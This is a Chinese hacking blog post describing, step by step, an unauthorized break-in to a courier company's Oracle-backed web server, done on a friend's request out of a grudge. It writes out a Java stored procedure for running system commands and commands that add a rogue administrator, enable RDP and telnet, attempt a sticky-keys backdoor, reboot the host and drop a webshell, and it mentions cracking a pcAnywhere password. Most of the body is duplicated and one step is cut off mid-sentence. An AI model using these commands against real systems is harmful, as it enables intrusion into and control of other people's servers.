對(duì)著名快遞公司的艱難的oracle入侵過程(圖)
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 19:36:06 作者:佚名
我要評(píng)論

輕車熟路
一個(gè)對(duì)新飛鴻有意見的親密朋友找我說能不能把這個(gè)公司的網(wǎng)站給搞了,我一聽公司,心想,企業(yè)站都是垃圾,好搞,便痛快答應(yīng)(人品真好!),呵呵,但是后來(lái)才發(fā)現(xiàn)沒我想像的那么簡(jiǎn)單。
asp的頁(yè)面,啊d和google掃注入點(diǎn)沒有,意料之中,工具誤
第二步:
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
第三步:
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
創(chuàng)建完之后,就可以通過x := RUN_CMz(dos命令)來(lái)執(zhí)行系統(tǒng)命令了。
建 完存儲(chǔ)過程后系統(tǒng)命令執(zhí)行成功, 如圖
但是后來(lái)發(fā)現(xiàn)這個(gè)shell很不爽,如果遇到需要交互的命令就會(huì)卡死,剛開始想用"ftp 我的ip地址"檢測(cè)下能不能執(zhí)行,結(jié)果卡死,我這邊防火墻也沒反應(yīng),不解,后tasklist,發(fā)現(xiàn)ftp://ftp.exe/,確定對(duì)方不能連接外網(wǎng),可能有防火墻或作了設(shè)置,于是用ftp傳馬思路拋棄,打個(gè)systeninfo命令看下系統(tǒng),是2003,于是打算先建個(gè)超級(jí)用戶然后開3389,執(zhí)行exec :x := RUN_CMD('net user')結(jié)果卡死,猜測(cè)net被刪,執(zhí)行
exec :x := RUN_CMD('net1 user');
成功,執(zhí)行
exec :x := RUN_CMD('net1 user rebeyond rebeyond /add&net1 localgroup administrators rebeyond /add');
成功,下面用reg命令讀下3389的狀態(tài)和端口,執(zhí)行
exec :x := RUN_CMD('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"');
發(fā)現(xiàn)fDenyTSconnections值為1,說明3389關(guān)閉,于是依次執(zhí)行以下語(yǔ)句開3389:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
因?yàn)閏md一交互就卡死,所以加了個(gè)/f強(qiáng)行參數(shù),搞定后運(yùn)行mstsc連接,結(jié)果另人吐血,能連上但是卻沒有登錄窗口,提示說什么" awgina.dll被替換成未知版本",猜測(cè)可能把3389用到的dll給刪除了,因?yàn)殡m然不能登錄但可以連接,于是想到了替換sethc.exe,在shell下依次執(zhí)行:
exec :x :=RUN_CMD ('del c:\windows\system32\sethc.exe /f')
exec :x :=RUN_CMD('del C:\WINDOWS\system32\dllcache\sethc.exe /f')
exec :x :=RUN_CMD('copy c:\windows\explorer.exe c:\windows\system32\sethc.exe'),
按五次shift后發(fā)現(xiàn)沒替換成功,也沒刪除成功,推斷原因只有一個(gè),就是沒權(quán)限,但是我在前面用java建shell前專門賦予了權(quán)限的,不解,百度一番!發(fā)現(xiàn)賦予文件操作權(quán)限必須得以dba的方式登錄,但是前面說了我們無(wú)法以dba方式登錄,頓時(shí)大腦一片空白,沒有寫和刪除權(quán)限,只有運(yùn)行權(quán)限,思路一下少了很多,繼續(xù)!!忽然想到了telnet,用reg查看了下telnet服務(wù)的狀態(tài)為禁用,于是執(zhí)行
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr" /v Start /t REG_DWORD /d 2 /f
把telnet服務(wù)設(shè)置為自動(dòng),然后就是想辦法讓服務(wù)器重啟開telnet。
柳暗花明:
shell里執(zhí)行
rundll32.exe user.exe,restartwindows
,不一會(huì)主機(jī)重啟了,成功telnet,這樣權(quán)限我們已經(jīng)拿到了!但是要向圖像界面進(jìn)軍,在telnet執(zhí)行netstat -an看了下端口,發(fā)現(xiàn)5632,熟悉提權(quán)的人應(yīng)該很熟悉,這是pcanywhere的默認(rèn)端口,但是怎么才能知道pcanywhere的密碼呢?因?yàn)椴荒苓B接外網(wǎng),所以直接傳cif文件是不可能的,于是想到了webshell!在telnet里找到站的 目錄d:\site,執(zhí)行
echo "" >d:\site\guestboook.asp
訪問成功,然后用海洋一句話提交大馬成功如圖:
跳轉(zhuǎn)到pcanywhere的cif文件目錄下載cif文件并破解,成功得到pcanywhere的密碼,如圖:
到這基本就結(jié)束了,但是pcanywhere遠(yuǎn)程很不爽,于是還是想開用3389,于是百度搜索原因,發(fā)現(xiàn)是3389和pcanywhere沖突的原因并找到了解決辦法,刪除某個(gè)注冊(cè)表項(xiàng)就搞定了,在pcanywhere操作就很簡(jiǎn)單了,搞定后重啟服務(wù)器,連接對(duì)方3389,終于看到了熟悉的登錄界面,用前面建的用戶成功登入!如圖:
至此整個(gè)入侵過程宣告結(jié)束!
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
第三步:
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
創(chuàng)建完之后,就可以通過x := RUN_CMz(dos命令)來(lái)執(zhí)行系統(tǒng)命令了。
建 完存儲(chǔ)過程后系統(tǒng)命令執(zhí)行成功, 如圖

但是后來(lái)發(fā)現(xiàn)這個(gè)shell很不爽,如果遇到需要交互的命令就會(huì)卡死,剛開始想用"ftp 我的ip地址"檢測(cè)下能不能執(zhí)行,結(jié)果卡死,我這邊防火墻也沒反應(yīng),不解,后tasklist,發(fā)現(xiàn)ftp://ftp.exe/,確定對(duì)方不能連接外網(wǎng),可能有防火墻或作了設(shè)置,于是用ftp傳馬思路拋棄,打個(gè)systeninfo命令看下系統(tǒng),是2003,于是打算先建個(gè)超級(jí)用戶然后開3389,執(zhí)行exec :x := RUN_CMD('net user')結(jié)果卡死,猜測(cè)net被刪,執(zhí)行
exec :x := RUN_CMD('net1 user');
成功,執(zhí)行
exec :x := RUN_CMD('net1 user rebeyond rebeyond /add&net1 localgroup administrators rebeyond /add');
成功,下面用reg命令讀下3389的狀態(tài)和端口,執(zhí)行
exec :x := RUN_CMD('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"');
發(fā)現(xiàn)fDenyTSconnections值為1,說明3389關(guān)閉,于是依次執(zhí)行以下語(yǔ)句開3389:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
因?yàn)閏md一交互就卡死,所以加了個(gè)/f強(qiáng)行參數(shù),搞定后運(yùn)行mstsc連接,結(jié)果另人吐血,能連上但是卻沒有登錄窗口,提示說什么" awgina.dll被替換成未知版本",猜測(cè)可能把3389用到的dll給刪除了,因?yàn)殡m然不能登錄但可以連接,于是想到了替換sethc.exe,在shell下依次執(zhí)行:
exec :x :=RUN_CMD ('del c:\windows\system32\sethc.exe /f')
exec :x :=RUN_CMD('del C:\WINDOWS\system32\dllcache\sethc.exe /f')
exec :x :=RUN_CMD('copy c:\windows\explorer.exe c:\windows\system32\sethc.exe'),
按五次shift后發(fā)現(xiàn)沒替換成功,也沒刪除成功,推斷原因只有一個(gè),就是沒權(quán)限,但是我在前面用java建shell前專門賦予了權(quán)限的,不解,百度一番!發(fā)現(xiàn)賦予文件操作權(quán)限必須得以dba的方式登錄,但是前面說了我們無(wú)法以dba方式登錄,頓時(shí)大腦一片空白,沒有寫和刪除權(quán)限,只有運(yùn)行權(quán)限,思路一下少了很多,繼續(xù)!!忽然想到了telnet,用reg查看了下telnet服務(wù)的狀態(tài)為禁用,于是執(zhí)行
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr" /v Start /t REG_DWORD /d 2 /f
把telnet服務(wù)設(shè)置為自動(dòng),然后就是想辦法讓服務(wù)器重啟開telnet。
柳暗花明:
shell里執(zhí)行
rundll32.exe user.exe,restartwindows
,不一會(huì)主機(jī)重啟了,成功telnet,這樣權(quán)限我們已經(jīng)拿到了!但是要向圖像界面進(jìn)軍,在telnet執(zhí)行netstat -an看了下端口,發(fā)現(xiàn)5632,熟悉提權(quán)的人應(yīng)該很熟悉,這是pcanywhere的默認(rèn)端口,但是怎么才能知道pcanywhere的密碼呢?因?yàn)椴荒苓B接外網(wǎng),所以直接傳cif文件是不可能的,于是想到了webshell!在telnet里找到站的 目錄d:\site,執(zhí)行
echo "" >d:\site\guestboook.asp
訪問成功,然后用海洋一句話提交大馬成功如圖:

跳轉(zhuǎn)到pcanywhere的cif文件目錄下載cif文件并破解,成功得到pcanywhere的密碼,如圖:

到這基本就結(jié)束了,但是pcanywhere遠(yuǎn)程很不爽,于是還是想開用3389,于是百度搜索原因,發(fā)現(xiàn)是3389和pcanywhere沖突的原因并找到了解決辦法,刪除某個(gè)注冊(cè)表項(xiàng)就搞定了,在pcanywhere操作就很簡(jiǎn)單了,搞定后重啟服務(wù)器,連接對(duì)方3389,終于看到了熟悉的登錄界面,用前面建的用戶成功登入!如圖:

至此整個(gè)入侵過程宣告結(jié)束!
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來(lái)攻擊頁(yè)面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時(shí),如果這個(gè)論壇比較大,訪問的人比較多,打開頁(yè)面的速度會(huì)比較慢,對(duì)不?!一般來(lái)說,訪問的人越多,論壇的頁(yè)2024-01-06Windows系統(tǒng)安全風(fēng)險(xiǎn)-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險(xiǎn)微軟并不認(rèn)為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語(yǔ)句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對(duì)于加密的https,我們一直認(rèn)為它是相對(duì)安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對(duì)你2016-08-10iPhone和Mac也會(huì)被黑 一條iMessage密碼可能就被盜了
一直以來(lái)蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會(huì)導(dǎo)致用戶信息泄露。2016-07-27- 國(guó)家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號(hào)被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進(jìn)入攻擊者郵箱
面對(duì)惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進(jìn)入攻擊者郵箱2016-07-06